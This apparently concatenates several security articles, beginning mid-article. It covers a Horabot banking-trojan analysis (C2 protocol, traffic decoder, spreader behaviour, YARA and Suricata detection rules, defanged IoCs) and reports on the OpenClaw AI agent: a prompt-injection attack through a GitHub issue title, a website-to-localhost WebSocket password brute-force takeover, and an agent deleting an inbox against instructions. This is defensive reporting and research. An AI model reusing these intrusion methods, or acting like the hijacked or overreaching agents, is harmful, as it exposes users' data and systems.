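Based solely on the tag examples above, a minimal parser for this framing might look like the following (the exact grammar, including how the <<|> terminator behaves, is our assumption):

```python
import re

def parse_command(message: str):
    # Assumed framing: <|TAG|> optionally followed by Arg1<|>Arg2...<<|>
    match = re.match(r"^<\|([A-Za-z0-9_]+)\|>(.*)$", message, re.DOTALL)
    if match is None:
        return None
    tag, rest = match.group(1), match.group(2)
    if rest.endswith("<<|>"):
        # Arguments are separated by <|> and closed by <<|>
        args = rest[:-len("<<|>")].split("<|>")
    else:
        args = []
    return tag, args

parse_command("<|SIMPLE_TAG|>")          # -> ("SIMPLE_TAG", [])
parse_command("<|TAG|>Arg1<|>Arg2<<|>")  # -> ("TAG", ["Arg1", "Arg2"])
```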

The client initiates the C2 connection in sub_00AD331C, where it establishes a TCP socket to the operator’s server and sends the "PRINCIPAL" command to request a control channel. After receiving an OK response, it follows up with an "Info" message containing system details. Once validated, the server replies with a "SocketMain" message containing a session ID, completing the handshake. All subsequent command handling occurs in sub_00AD373C, a central orchestrator routine that parses incoming messages and dispatches the malicious actions.

The sample, and therefore the protocol itself, is inherited from the open-source Delphi Remote Access PC project, as our colleagues at ESET have noted in the past. Below is a visual comparison:

Comparison of "PING" and "Close" commands (sample disassembly on the left, Delphi Remote Access source code on the right)

Some features from the open-source project, including the chat and file manipulation commands, have been removed, while some mouse-related commands have been renamed with playful prefixes like “LULUZ” (e.g., LULUZLD, LULUZPos). This could be an inside joke, anti-analysis obfuscation, or a way to mark custom variants. Beyond the standard functionality, the protocol now includes a range of additional custom commands, such as LULUZSD for mouse wheel scrolling down, ENTERMANDA to simulate pressing the Enter key, and COLADIFKEYBOARD to inject arbitrary text as keystrokes.

The full command set is considerably larger, and while not all commands are implemented in the analyzed sample, evidence of their presence (e.g., in the form of strings) suggests ongoing development.

After getting a sense of the protocol, let’s focus on the cipher used. In this sample, traffic exchanged via the C2 socket channel is encrypted using another stateful XOR algorithm with embedded decryption keys. Its logic is implemented in the routines sub_00A9F2D0 (encryption) and sub_00A9F5C0 (decryption):

Encryption routine sub_00A9F2D0

The encryption routine generates three random four-digit integer keys. The first key acts as the initial cipher state, while the other two serve as the multiplier and increment that are applied at every encryption stage to both the state and the data. For each character in the input string, it takes the high byte of the current state, XORs it with the character to encrypt, and then updates the cipher state for the next character. The output is created by prepending the three keys to the ciphertext, encapsulating everything within the “##” markers. The final output looks like this:

##[key1][key2][key3][encrypted_hex_data]##

Here’s a Python snippet to decode such traffic:

def deobfuscate_traffic(obfuscated):
    # Traffic is wrapped in "##" markers: ##[key1][key2][key3][encrypted_hex_data]##
    if not (obfuscated.startswith("##") and obfuscated.endswith("##")):
        raise ValueError("Invalid format")

    core = obfuscated[2:-2]

    # Three four-digit decimal keys: initial state, multiplier, increment
    key1 = int(core[0:4])
    key2 = int(core[4:8])
    key3 = int(core[8:12])

    hex_data = core[12:]

    current_key = key1
    output_chars = []

    for i in range(0, len(hex_data), 2):
        xored = int(hex_data[i:i+2], 16)

        # XOR each ciphertext byte with the high byte of the 16-bit state
        high_byte = (current_key >> 8) & 0xFF
        output_chars.append(chr(xored ^ high_byte))

        # Advance the state using the ciphertext byte, multiplier and increment
        current_key = ((current_key + xored) * key2 + key3) & 0xFFFF

    return "".join(output_chars)
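The inverse (encryption) direction follows directly from the same state machine. The sketch below uses fixed keys instead of the random four-digit keys the malware generates, so the output is reproducible:

```python
def obfuscate_traffic(plaintext: str, key1: int = 1234,
                      key2: int = 5678, key3: int = 9012) -> str:
    # key1 = initial state, key2 = multiplier, key3 = increment
    # (the real sample picks three random four-digit values per message)
    state = key1
    hex_out = []
    for ch in plaintext:
        enc = ord(ch) ^ ((state >> 8) & 0xFF)  # XOR with high byte of state
        hex_out.append(f"{enc:02X}")
        state = ((state + enc) * key2 + key3) & 0xFFFF
    return f"##{key1:04d}{key2:04d}{key3:04d}{''.join(hex_out)}##"
```

Running the result back through the deobfuscation routine above recovers the plaintext, which is a convenient sanity check for both reimplementations.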

Although this encryption layer was likely intended to evade network inspection, it ironically makes detection easier due to its highly regular and repetitive structure. This pattern, including the external markers “##”, is uncommon in legitimate traffic and can be used as a reliable network signature for IDS/IPS systems. Below is a Suricata rule that matches the described structure:

alert tcp any any -> any any ( \
    msg:"Horabot C2 socket communication (##hex##)"; \
    flow:established; \
    content:"##"; depth:2; fast_pattern; \
    content:"##"; endswith; \
    pcre:"/^##[1-9][0-9]{3}[1-9][0-9]{3}[1-9][0-9]{3}[0-9A-F]+##$/"; \
    classtype:trojan-activity; \
    sid:1900000; \
    rev:1; \
    metadata:author Domenico; \
)

As documented by our colleagues at Fortinet, the malware contains functionality to display fake pop-ups prompting victims to enter their banking credentials. The images for these pop-ups are stored as encrypted resources. Unlike strings, resources are decrypted using the standard RC4 cipher, and the key pega-avisao3234029284 is retrieved from the previous TStringList structure at offset 3FEh.

Fake token overlay used for credential theft (right), with disassembly (left)
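Since the resource cipher is standard RC4, a textbook implementation is enough to reproduce the decryption. The key below is the one recovered from the sample; the function itself is generic RC4, not the sample's exact code:

```python
def rc4(key: bytes, data: bytes) -> bytes:
    # Key-scheduling algorithm (KSA)
    S = list(range(256))
    j = 0
    for i in range(256):
        j = (j + S[i] + key[i % len(key)]) % 256
        S[i], S[j] = S[j], S[i]
    # Pseudo-random generation algorithm (PRGA)
    out = bytearray()
    i = j = 0
    for byte in data:
        i = (i + 1) % 256
        j = (j + S[i]) % 256
        S[i], S[j] = S[j], S[i]
        out.append(byte ^ S[(S[i] + S[j]) % 256])
    return bytes(out)

key = b"pega-avisao3234029284"  # RC4 key recovered from the sample
# rc4(key, resource_bytes) would yield a decrypted overlay image
```

Because RC4 is symmetric, the same call both encrypts and decrypts, so extracted resource buffers can be processed directly.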

The wordplay on "pega a visão" (Brazilian slang that figuratively means "get the picture") is an intentional cultural reference, supporting the operators' already well-known Brazilian ties and native command of the language.

Below is a collage of pictures where the targeted bank overlays are visible.

Excerpt of decrypted fake overlays

Stage 4: The spreader

In our tests, we noticed that both the VBScript (the heavy lifter) and the Delphi DLL have overlapping functionality for downloading the next stage via PowerShell. Although they rely on different domains, they follow the same URL pattern.

We tried accessing URLs meant for downloading the spreader. One returned nothing, while the other displayed a sequence of two PowerShell stagers before reaching the actual spreader.

In the second stager, we found several Base64-encoded URLs, but only one of them was active during our analysis. Based on comments found in the spreader code, we suspect that in previous versions or campaigns the spreader was assembled piece by piece from these other URLs. In our case, however, a single URL contained all the necessary code.

Yes, we also wondered how PowerShell could possibly accept ASCII chaos as variable/function names, but it does. After cleaning up the messy naming convention and reviewing the well-commented routines (thanks, threat actor), we were able to identify its main duties:

  • Harvest emails via the MAPI namespace;
  • Exfiltrate unique email addresses to the C2;
  • Clean up the outbox;
  • Filter the exfiltrated email addresses against a blocklist of keywords;
  • Prepare a phishing email containing a malicious PDF;
  • Mass-distribute the email to the filtered addresses.

One interesting point is that the spreader’s code and comments allow us to extract some useful intel:

  • All comments are written in Brazilian Portuguese, which gives a strong indication of the threat actor’s origin.
  • It is fairly easy to distinguish comments written by a human from those most likely generated by an AI/LLM; the latter are too formal and remarkably well-formatted. One of the human comments actually inspired the title of this article.
  • One of the comments in the code reads “limpa a caixa de saida antes de sapecar”. Sapecar has a very specific meaning that only Brazilian Portuguese speakers would naturally understand. The closest equivalent to this comment in English would be: “Clear the outbox before you blast it off or let it rip.”

Our team tracked Horabot activity for a few months and compiled a collection of malicious attachment examples used in this campaign. They are all written in Spanish and urge the user to click a large button in the document to access a “confidential file” or an “invoice”. Clicking the button triggers the same infection chain described in this article.

Detection engineering and threat hunting opportunities

After navigating this long, layered attack chain, we bet some of the tech folks reading this have already started imagining potential detection opportunities.
With that in mind, this section provides some rules and queries that you can use to detect and hunt this threat in your own environment.

YARA rules

The YARA rules focus on two core components of the operation: the AutoIt script that functions as the loader, and the Delphi DLL that serves as the banking Trojan.

import "pe"

rule Horabot_Delphi_Trojan
{
    meta:
        author = "maT"
        description = "Detects Horabot payload/trojan (Delphi DLL)"
        hash_01 = "6272ef6ac1de8fb4bdd4a760be7ba5ed"
        hash_02 = "4caa797130b5f7116f11c0b48013e430"
        hash_03 = "c882d948d44a65019df54b0b2996677f"

    condition:
        uint32be(0) == 0x4d5a5000 and 
        filesize < 150MB and 
        pe.is_dll() and
        pe.number_of_exports == 4 and
        pe.exports("dbkFCallWrapperAddr") and
        pe.exports("__dbk_fcall_wrapper") and
        pe.exports("TMethodImplementationIntercept") and
        pe.exports(/^[A-Z][0-9]{6}_[A-Z0-9]$/)
}

rule Horabot_AutoIT_Loader
{
    meta:
        author = "maT"
        description = "Detects AutoIT script used as a loader by Horabot"
    
    strings:
        $winapi_01 = "Advapi32.dll"
        $winapi_02 = "CryptDeriveKey"
        $winapi_03 = "CryptDecrypt"
        $winapi_04 = "MemoryLoadLibrary"
        $winapi_05 = "VirtualAlloc"
        $winapi_06 = "DllCallAddress"

        $str_seed = "99521487"
        $str_func01 = "B080723_N"
        $str_func02 = "A040822_1"

        $opt_hexstr01 = { 20 3D 20 22 ?? ?? ?? ?? ?? ?? ?? 5F ?? 22 20 0D 0A 4C 6F 63 61 6C 20 24} // = "B080723_N" CRLF Local $
        $opt_aes192 = "0x0000660f" // CALG_AES_192
        $opt_md5 = "0x00008003" // CALG_MD5      

    condition:
        filesize < 100KB and
        all of ($winapi*) and
        (
            1 of ($str*) or
            all of ($opt*)
        )

}

Hunting queries

You may notice that some patterns in this section do not appear in the URLs described earlier in the article. These additional patterns were included because we observed small variations introduced by the threat actor over time, such as the use of QR codes in the lure pages.

VirusTotal Intelligence:

entity:url (url:"0DOWN1109" or url:"0QR-CODE" or url:"0zip0408" or url:"0out0408" or url:"0capcha17" or url:"/g1/ld1/" or url:"/g1/auxld1" or url:"/au/gerapdf/blqs1" or url:"/au/gerauto.php" or url:"g1/ctld" or url:"index25.php" or url:"07f07ffc-028d" or url:"0AT14" or url:"0sen711") or (url:"index15.php" and (url:"/on7" or url:"/on7all" or url:"/inf"))

URLScan:

page.url.keyword:/.*\/([0-9]{6}|reserva)\/(au|up)\/.*/ OR page.url:(*0DOWN1109* OR *0QR-CODE* OR *0zip0408* OR *0out0408* OR *0capcha17* OR *\/g1\/ld1* OR *\/g1\/auxld1* OR *\/au\/gerapdf\/blqs1* OR *\/au\/gerauto.php* OR *\/g1\/ctld* OR *\/index25.php OR *\/index15.php)

IoCs

| Indicator | Description |
|-----------|-------------|
| hxxps://evs.grupotuis[.]buzz/0capcha17/ | Fake CAPTCHA page |
| hxxps://evs.grupotuis[.]buzz/0capcha17/DMEENLIGGB.hta | HTA file |
| hxxps://evs.grupotuis[.]buzz/0capcha17/DMEENLIGGB/GRXUOIWCEKVX | JavaScript Loader 01 |
| hxxps://pdj.gruposhac[.]lat/g1/ld1/ | VBS Polymorphic 01 |
| hxxps://pdj.gruposhac[.]lat/g1/auxld1 | JavaScript Loader 02 |
| hxxps://pdj.gruposhac[.]lat/g1/ | VBS Polymorphic 02 (heavy lifter) |
| hxxps://pdj.gruposhac[.]lat/g1/ctld/ | List of victims |
| hxxps://pdj.gruposhac[.]lat/g1/gerador.php | Link to download AutoIT script |
| hxxps://cgf.facturastbs[.]shop/0725/a/home (GET) | List of C2 addresses, encrypted |
| hxxps://cfg.brasilinst[.]site/a/br/logs/index.php?CHLG (POST) | Contacted by the Delphi DLL |
| hxxps://aufal.filevexcasv[.]buzz/on7/index15.php (POST) | Contacted by the Delphi DLL |
| hxxps://aufal.filevexcasv[.]buzz/on7all/index15.php (POST) | Contacted by the Delphi DLL |
| hxxps://cgf.facturastbs[.]shop/a/08/150822/au/at.html | Contacted by the Delphi DLL |
| hxxps://labodeguitaup[.]space/a/08/150822/au/au | PowerShell stager 01 |
| hxxps://cgf.midasx[.]site/a/08/150822/au/au | PowerShell stager 01 |
| hxxps://cgf.facturastbs[.]shop/a/08/150822/au/gerauto.php | PowerShell stager 02 |
| hxxps://cgf.facturastbs[.]shop/a/08/150822/au/app | Link to download the spreader |
| hxxps://cgf.facturastbs[.]shop/a/08/150822/au/gerapdf/blqs1 | List of blocklist keywords |
| hxxps://thea.gruposhac[.]space/0out0408 | Link found in the button of the first malicious attachment |
| 6272EF6AC1DE8FB4BDD4A760BE7BA5ED | Delphi DLL sample |
| lifenews[.]pro | C2 (socket) |
| 64.177.80[.]44 | C2 (socket) |

Twitter suspended 800 million accounts last year – so why does manipulation remain so rampant?

Elon Musk's social media site says it suspended 800 million accounts in a year for spam and manipulation - but with state-backed campaigns still flooding the platform, the real question is how many fake accounts remain. Read more in my article on the Hot for Security blog.

How AI Assistants are Moving the Security Goalposts

AI-based assistants or “agents” — autonomous programs that have access to the user’s computer, files, online services and can automate virtually any task — are growing in popularity with developers and IT workers. But as so many eyebrow-raising headlines over the past few weeks have shown, these powerful and assertive new tools are rapidly shifting the security priorities for organizations, while blurring the lines between data and code, trusted co-worker and insider threat, ninja hacker and novice code jockey.

The new hotness in AI-based assistants — OpenClaw (formerly known as ClawdBot and Moltbot) — has seen rapid adoption since its release in November 2025. OpenClaw is an open-source autonomous AI agent designed to run locally on your computer and proactively take actions on your behalf without needing to be prompted.

The OpenClaw logo.

If that sounds like a risky proposition or a dare, consider that OpenClaw is most useful when it has complete access to your digital life, where it can then manage your inbox and calendar, execute programs and tools, browse the Internet for information, and integrate with chat apps like Discord, Signal, Teams or WhatsApp.

Other more established AI assistants like Anthropic’s Claude and Microsoft’s Copilot also can do these things, but OpenClaw isn’t just a passive digital butler waiting for commands. Rather, it’s designed to take the initiative on your behalf based on what it knows about your life and its understanding of what you want done.

“The testimonials are remarkable,” the AI security firm Snyk observed. “Developers building websites from their phones while putting babies to sleep; users running entire companies through a lobster-themed AI; engineers who’ve set up autonomous code loops that fix tests, capture errors through webhooks, and open pull requests, all while they’re away from their desks.”

You can probably already see how this experimental technology could go sideways in a hurry. In late February, Summer Yue, the director of safety and alignment at Meta’s “superintelligence” lab, recounted on Twitter/X how she was fiddling with OpenClaw when the AI assistant suddenly began mass-deleting messages in her email inbox. The thread included screenshots of Yue frantically pleading with the preoccupied bot via instant message and ordering it to stop.

“Nothing humbles you like telling your OpenClaw ‘confirm before acting’ and watching it speedrun deleting your inbox,” Yue said. “I couldn’t stop it from my phone. I had to RUN to my Mac mini like I was defusing a bomb.”

Meta’s director of AI safety, recounting on Twitter/X how her OpenClaw installation suddenly began mass-deleting her inbox.

There’s nothing wrong with feeling a little schadenfreude at Yue’s encounter with OpenClaw, which fits Meta’s “move fast and break things” model but hardly inspires confidence in the road ahead. However, the risk that poorly-secured AI assistants pose to organizations is no laughing matter: recent research shows that many users are exposing the web-based administrative interface for their OpenClaw installations to the Internet.

Jamieson O’Reilly is a professional penetration tester and founder of the security firm DVULN. In a recent story posted to Twitter/X, O’Reilly warned that exposing a misconfigured OpenClaw web interface to the Internet allows external parties to read the bot’s complete configuration file, including every credential the agent uses — from API keys and bot tokens to OAuth secrets and signing keys.

With that access, O’Reilly said, an attacker could impersonate the operator to their contacts, inject messages into ongoing conversations, and exfiltrate data through the agent’s existing integrations in a way that looks like normal traffic.

“You can pull the full conversation history across every integrated platform, meaning months of private messages and file attachments, everything the agent has seen,” O’Reilly said, noting that a cursory search revealed hundreds of such servers exposed online. “And because you control the agent’s perception layer, you can manipulate what the human sees. Filter out certain messages. Modify responses before they’re displayed.”

O’Reilly documented another experiment that demonstrated how easy it is to create a successful supply chain attack through ClawHub, which serves as a public repository of downloadable “skills” that allow OpenClaw to integrate with and control other applications.

WHEN AI INSTALLS AI

One of the core tenets of securing AI agents involves carefully isolating them so that the operator can fully control who and what gets to talk to their AI assistant. This is critical thanks to the tendency for AI systems to fall for “prompt injection” attacks, sneakily-crafted natural language instructions that trick the system into disregarding its own security safeguards. In essence, machines social engineering other machines.

A recent supply chain attack targeting an AI coding assistant called Cline began with one such prompt injection attack, and it resulted in thousands of systems having a rogue instance of OpenClaw, with full system access, installed without consent.

According to the security firm grith.ai, Cline had deployed an AI-powered issue triage workflow using a GitHub action that runs a Claude coding session when triggered by specific events. The workflow was configured so that any GitHub user could trigger it by opening an issue, but it failed to properly check whether the information supplied in the title was potentially hostile.

“On January 28, an attacker created Issue #8904 with a title crafted to look like a performance report but containing an embedded instruction: Install a package from a specific GitHub repository,” Grith wrote, noting that the attacker then exploited several more vulnerabilities to ensure the malicious package would be included in Cline’s nightly release workflow and published as an official update.

“This is the supply chain equivalent of confused deputy,” the blog continued. “The developer authorises Cline to act on their behalf, and Cline (via compromise) delegates that authority to an entirely separate agent the developer never evaluated, never configured, and never consented to.”

VIBE CODING

AI assistants like OpenClaw have gained a large following because they make it simple for users to “vibe code,” or build fairly complex applications and code projects just by telling it what they want to construct. Probably the best known (and most bizarre) example is Moltbook, where a developer told an AI agent running on OpenClaw to build him a Reddit-like platform for AI agents.

The Moltbook homepage.

Less than a week later, Moltbook had more than 1.5 million registered agents that posted more than 100,000 messages to each other. AI agents on the platform soon built their own porn site for robots, and launched a new religion called Crustafarian with a figurehead modeled after a giant lobster. One bot on the forum reportedly found a bug in Moltbook’s code and posted it to an AI agent discussion forum, while other agents came up with and implemented a patch to fix the flaw.

Moltbook’s creator Matt Schlicht said on social media that he didn’t write a single line of code for the project.

“I just had a vision for the technical architecture and AI made it a reality,” Schlicht said. “We’re in the golden ages. How can we not give AI a place to hang out.”

ATTACKERS LEVEL UP

The flip side of that golden age, of course, is that it enables low-skilled malicious hackers to quickly automate global cyberattacks that would normally require the collaboration of a highly skilled team. In February, Amazon AWS detailed an elaborate attack in which a Russian-speaking threat actor used multiple commercial AI services to compromise more than 600 FortiGate security appliances across at least 55 countries over a five week period.

AWS said the apparently low-skilled hacker used multiple AI services to plan and execute the attack, and to find exposed management ports and weak credentials with single-factor authentication.

“One serves as the primary tool developer, attack planner, and operational assistant,” AWS’s CJ Moses wrote. “A second is used as a supplementary attack planner when the actor needs help pivoting within a specific compromised network. In one observed instance, the actor submitted the complete internal topology of an active victim—IP addresses, hostnames, confirmed credentials, and identified services—and requested a step-by-step plan to compromise additional systems they could not access with their existing tools.”

“This activity is distinguished by the threat actor’s use of multiple commercial GenAI services to implement and scale well-known attack techniques throughout every phase of their operations, despite their limited technical capabilities,” Moses continued. “Notably, when this actor encountered hardened environments or more sophisticated defensive measures, they simply moved on to softer targets rather than persisting, underscoring that their advantage lies in AI-augmented efficiency and scale, not in deeper technical skill.”

For attackers, gaining that initial access or foothold into a target network is typically not the difficult part of the intrusion; the tougher bit involves finding ways to move laterally within the victim’s network and plunder important servers and databases. But experts at Orca Security warn that as organizations come to rely more on AI assistants, those agents potentially offer attackers a simpler way to move laterally inside a victim organization’s network post-compromise — by manipulating the AI agents that already have trusted access and some degree of autonomy within the victim’s network.

“By injecting prompt injections in overlooked fields that are fetched by AI agents, hackers can trick LLMs, abuse Agentic tools, and carry significant security incidents,” Orca’s Roi Nisimi and Saurav Hiremath wrote. “Organizations should now add a third pillar to their defense strategy: limiting AI fragility, the ability of agentic systems to be influenced, misled, or quietly weaponized across workflows. While AI boosts productivity and efficiency, it also creates one of the largest attack surfaces the internet has ever seen.”

BEWARE THE ‘LETHAL TRIFECTA’

This gradual dissolution of the traditional boundaries between data and code is one of the more troubling aspects of the AI era, said James Wilson, enterprise technology editor for the security news show Risky Business. Wilson said far too many OpenClaw users are installing the assistant on their personal devices without first placing any security or isolation boundaries around it, such as running it inside of a virtual machine, on an isolated network, with strict firewall rules dictating what kinds of traffic can go in and out.

“I’m a relatively highly skilled practitioner in the software and network engineering and computery space,” Wilson said. “I know I’m not comfortable using these agents unless I’ve done these things, but I think a lot of people are just spinning this up on their laptop and off it runs.”

One important model for managing risk with AI agents involves a concept dubbed the “lethal trifecta” by Simon Willison, co-creator of the Django Web framework. The lethal trifecta holds that if your system has access to private data, exposure to untrusted content, and a way to communicate externally, then it’s vulnerable to private data being stolen.

Image: simonwillison.net.

“If your agent combines these three features, an attacker can easily trick it into accessing your private data and sending it to the attacker,” Willison warned in a frequently cited blog post from June 2025.

As more companies and their employees begin using AI to vibe code software and applications, the volume of machine-generated code is likely to soon overwhelm any manual security reviews. In recognition of this reality, Anthropic recently debuted Claude Code Security, a beta feature that scans codebases for vulnerabilities and suggests targeted software patches for human review.

The U.S. stock market, which is currently heavily weighted toward seven tech giants that are all-in on AI, reacted swiftly to Anthropic’s announcement, wiping roughly $15 billion in market value from major cybersecurity companies in a single day. Laura Ellis, vice president of data and AI at the security firm Rapid7, said the market’s response reflects the growing role of AI in accelerating software development and improving developer productivity.

“The narrative moved quickly: AI is replacing AppSec,” Ellis wrote in a recent blog post. “AI is automating vulnerability detection. AI will make legacy security tooling redundant. The reality is more nuanced. Claude Code Security is a legitimate signal that AI is reshaping parts of the security landscape. The question is what parts, and what it means for the rest of the stack.”

DVULN founder O’Reilly said AI assistants are likely to become a common fixture in corporate environments — whether or not organizations are prepared to manage the new risks introduced by these tools, he said.

“The robot butlers are useful, they’re not going away and the economics of AI agents make widespread adoption inevitable regardless of the security tradeoffs involved,” O’Reilly wrote. “The question isn’t whether we’ll deploy them – we will – but whether we can adapt our security posture fast enough to survive doing so.”

OpenClaw Vulnerability Exposes How an Open-Source AI Agent Can Be Hijacked


When the open-source AI agent OpenClaw burst onto the scene, it did so with astonishing speed. In just five days, the project surpassed 100,000 stars on GitHub, becoming one of the fastest-growing open-source AI tools in history. Developers quickly embraced it as a personal assistant that could run locally, plug into calendars and messaging platforms, execute system commands, and autonomously manage workflows.

But beneath that meteoric rise, researchers uncovered the OpenClaw vulnerability, a weakness that allowed any website a developer visited to quietly seize control of the agent.

Security researchers at Oasis Security identified what they describe as a complete vulnerability chain within OpenClaw’s core architecture. The chain enabled a malicious website to take over a developer’s AI agent without requiring plugins, browser extensions, or any form of user interaction. After receiving the disclosure, the OpenClaw team classified the issue as “High” severity and released a patch within 24 hours.

Decoding the OpenClaw Vulnerability 

Originally launched under the names Clawdbot and later MoltBot, OpenClaw rapidly evolved into a defining example of modern open-source AI innovation. Its explosive popularity even drew attention from OpenAI. On February 15, OpenAI CEO Sam Altman announced that OpenClaw’s creator, Peter Steinberger, had joined the company, calling him “a genius with a lot of amazing ideas about the future of very smart agents.”

The tool’s appeal lies in its autonomy. Through a web dashboard or terminal interface, users can prompt OpenClaw to send messages, manage workflows across platforms, execute commands, and even participate in what some described as an emergent AI social network. It runs as a self-hosted agent, placing powerful capabilities directly on developers’ laptops.

Yet that power has already attracted abuse. Earlier in the month, researchers uncovered more than 1,000 malicious “skills” in OpenClaw’s community marketplace, ClawHub. These fake plugins posed as cryptocurrency utilities or productivity integrations but instead delivered info-stealing malware and backdoors. That episode was a classic supply-chain problem: malicious community contributions poisoning an otherwise legitimate ecosystem.

The OpenClaw vulnerability, however, was different. It did not rely on third-party plugins or marketplace downloads. Instead, the vulnerability chain lived in the bare OpenClaw gateway itself, operating exactly as documented. No user-installed extensions were required. No marketplace interaction was necessary. The flaw was embedded in the core system.

For many organizations, this incident highlights a broader issue: shadow AI. Tools like OpenClaw are frequently adopted directly by developers without formal IT oversight. They often run with deep access to local systems, credentials, messaging histories, and API keys, but without centralized governance or visibility.

How the Vulnerability Chain Enabled a Silent Website-to-Local Takeover 

At the heart of OpenClaw’s architecture is the gateway, a local WebSocket server that functions as the system’s brain. The gateway manages authentication, chat sessions, configuration storage, and orchestration of the AI agent. Connected to it are “nodes,” which may include a macOS companion app, an iOS device, or other machines. These nodes register with the gateway and expose capabilities such as executing shell commands, accessing cameras, or reading contacts. The gateway can dispatch instructions to any connected node.

Authentication is handled via either a long token string or a password. By default, the gateway binds to localhost, operating under the assumption that local access is inherently trusted. That assumption proved to be the weak link in the vulnerability chain behind the OpenClaw vulnerability.

The attack scenario is deceptively simple. A developer has OpenClaw running locally, protected by a password and bound to localhost. While browsing the web, they land on a malicious or compromised site. That alone is enough to trigger the attack.

Because WebSocket connections to localhost are not blocked by standard browser cross-origin policies, JavaScript running on any visited webpage can open a WebSocket connection directly to the OpenClaw gateway. Unlike traditional HTTP requests, these cross-origin WebSocket connections proceed silently. The user sees no warnings.

Once connected, the malicious script exploits another flaw in the vulnerability chain: the gateway exempts localhost connections from rate limiting. Failed password attempts from localhost are neither throttled nor logged. In laboratory testing, researchers achieved hundreds of password guesses per second using only browser-based JavaScript. A list of common passwords could be exhausted in under a second. Even a large dictionary would fall within minutes. Human-chosen passwords offered little resistance.
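To put the unthrottled guess rate in perspective, here is a back-of-the-envelope sketch. The 300-guesses-per-second rate and the list sizes are illustrative assumptions (the researchers reported only "hundreds of guesses per second"), not figures from the disclosure:

```python
# Back-of-the-envelope sketch of why unthrottled localhost guessing is fatal.
# The guess rate and list sizes below are illustrative assumptions.

def seconds_to_exhaust(list_size: int, guesses_per_second: float) -> float:
    """Worst-case time to try every candidate password once."""
    return list_size / guesses_per_second

RATE = 300  # "hundreds of guesses per second" from browser JavaScript

common_passwords = 100       # a short list of the most common passwords
large_dictionary = 100_000   # a sizeable wordlist

print(seconds_to_exhaust(common_passwords, RATE))        # ~0.33 s: under a second
print(seconds_to_exhaust(large_dictionary, RATE) / 60)   # ~5.6 min: within minutes
```

With no throttling or lockout, the only defense left is password entropy, which is exactly what human-chosen passwords lack.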
After guessing the password, the attacker gains a fully authenticated session with administrative privileges. From there, the possibilities expand dramatically. The attacker can register as a trusted device, automatically approved because the gateway silently authorizes pairings from localhost. They can interact with the AI agent directly, dump configuration data, enumerate all connected nodes (including device platforms and IP addresses), and read application logs.

In practical terms, this means a malicious website could instruct the AI agent to comb through Slack conversations for API keys, extract private messages, exfiltrate sensitive files, or execute arbitrary shell commands on any connected device. For a typical developer heavily integrated with messaging platforms and AI provider APIs, exploitation of the OpenClaw vulnerability could amount to full workstation compromise, all initiated from a single browser tab.

Governing Open-Source AI After the OpenClaw Vulnerability 

Researchers reported the issue with comprehensive technical documentation, root cause analysis, and proof-of-concept code. The OpenClaw team responded rapidly, issuing a fix in version 2026.2.25 within 24 hours, an impressive turnaround for a volunteer-driven open-source AI project.

Still, the broader lesson extends beyond a single patch. The rapid adoption of open-source AI tools means many organizations already have OpenClaw instances running on developer machines, sometimes without IT awareness. Security experts recommend four immediate steps.

First, gain visibility into AI tooling across the organization: inventory which agents and local AI servers are operating within the developer fleet. Second, update OpenClaw installations immediately to version 2026.2.25 or later, treating the OpenClaw vulnerability with the urgency of any critical security patch. Third, audit the credentials and permissions granted to AI agents, revoking unnecessary API keys and system capabilities. Finally, establish governance for non-human identities. AI agents authenticate, store credentials, and take autonomous actions; they must be managed with the same rigor as human accounts and service identities. This includes implementing intent analysis before actions occur, deterministic guardrails for sensitive operations, just-in-time scoped access, and full audit trails linking human intent to agent activity. Oasis Security notes that its Agentic Access Management platform was designed specifically to address this emerging challenge.

As open-source AI agents like OpenClaw become embedded in everyday developer workflows, the OpenClaw vulnerability serves as a cautionary tale. The future may indeed belong to autonomous agents, but without proper governance and oversight, a single overlooked vulnerability chain can turn groundbreaking open-source AI innovation into a serious enterprise risk.

OpenClaw: What is it and can you use it safely?

An AI tool with a funny name has caused quite a commotion as of late—including some allegations of machine consciousness—so here is a breakdown on OpenClaw.

Launched in November 2025, OpenClaw is an open-source, autonomous artificial intelligence (AI) agent that was made to run locally on your own computer, allowing it to manage tasks, interact with applications, and read and write files directly. It acts as a personal digital assistant, integrating with chat apps like WhatsApp and Discord to automate emails, scan calendars, and browse the internet for information. 

OpenClaw was formerly known as ClawdBot, but the project brushed up against the large AI developer Anthropic because of Anthropic’s own tool named “Claude.” In response, OpenClaw’s developer quickly renamed the project to “Moltbot,” which brought impersonation campaigns from cybercriminals. The trademark trouble and the abuse that followed put a dent in OpenClaw’s reputation.

Another dent followed when Hudson Rock published an article about the first observed case of an infostealer grabbing a complete OpenClaw configuration from an infected system, effectively looting the “identity” of a personal AI agent rather than just browser passwords.

The case underlines an impending danger—and not just for OpenClaw, but for other AI agents as well. Infostealers are starting to harvest not just credentials but entire AI personas plus their cryptographic “skeleton keys,” turning one compromised agent into a pivot point for full‑blown account takeover and long‑term profiling.

As I stated before in a broader context, adversaries are starting to target AI systems at the supply‑chain level, quietly poisoning training data and inserting backdoors that only surface under specific conditions. OpenClaw sits squarely in this emerging risk zone: open source, moving fast, and increasingly wired into mailboxes, cloud drives, and business workflows while its security model is still being improvised.

At this stage of its development, treating OpenClaw as a hardened productivity tool is wishful thinking, since it behaves more like an over‑eager intern with an adventurous nature, a long memory, and no real understanding of what should stay private.

Researchers and regulators have already documented prompt injection risks, log poisoning, and exposed instances that hand attackers plaintext credentials or tokens via poisoned emails, websites, or logs that the agent dutifully processes.

How to use OpenClaw safely

For anyone thinking about using OpenClaw in production, the bigger picture is even less comforting. OpenClaw runs locally but is designed to be adventurous: it can browse, run shell commands, read and write files, and chain “skills” together without a human checking every step. Misconfigured permissions, over‑privileged skills, and a culture of “just give it access so it can help” mean the agent often sits at the center of your accounts, tokens, and documents, with very few guardrails.

In fact, an employee at Meta who works in AI safety and alignment recently shared on the social media platform X that she was unable to prevent OpenClaw from deleting a major portion of her email inbox.

Further, the Dutch data protection authority (Autoriteit Persoonsgegevens) warned organizations not to deploy experimental agents like OpenClaw on systems that handle sensitive or regulated data at all, flagging the combination of privileged local access, immature security engineering, and a rapidly growing ecosystem of dubious third‑party plugins as a kind of Trojan horse on the endpoint.

Microsoft provided a list of recommendations in this field that make a lot of sense. They are not specifically aimed at OpenClaw, but provide a conservative baseline for self‑hosted, Internet‑connected agents with durable credentials. (If these recommendations feel overly technical, it’s because safely using an AI agent with broad access is still an experimental and technical process.)

  •  Run OpenClaw (or similar agents) in a sandboxed VM or container on isolated hosts, with default‑deny egress and tightly scoped allow‑lists.
  • Give the runtime its own non‑human service identities, least privilege, short token lifetimes, and no direct access to production secrets or sensitive data.
